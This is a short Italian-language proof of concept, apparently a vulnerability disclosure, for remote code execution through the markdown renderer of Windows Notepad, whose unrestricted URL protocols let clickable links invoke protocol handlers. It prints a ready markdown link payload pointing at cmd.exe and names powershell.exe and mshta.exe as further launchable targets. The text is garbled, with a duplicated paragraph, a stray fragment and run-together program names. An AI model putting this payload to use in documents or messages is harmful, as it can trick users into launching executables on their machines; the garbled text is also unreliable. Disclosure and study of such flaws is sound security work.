
PoC per una vulnerabilità di esecuzione remota di codice nel renderer markdown del Blocco note di Windows. Il motore markdown non limita i protocolli URL, consentendo l'attivazione di gestori di protocollo arbitrari tramite link cliccabili.
PoC per una vulnerabilità di esecuzione remota di codice nel renderer Markdown del Blocco note di Windows. Il motore Markdown non limita i protocolli URL, consentendo l'attivazione di gestori di protocollo arbitrari tramite link cliccabili.
file://)[click](file://C:/windows/system32/cmd.exe)
Avvia qualsiasi eseguibile già presente sul disco — cmd.exe, , , ecc.
powershell.exemshta.exe

Resta al sicuro!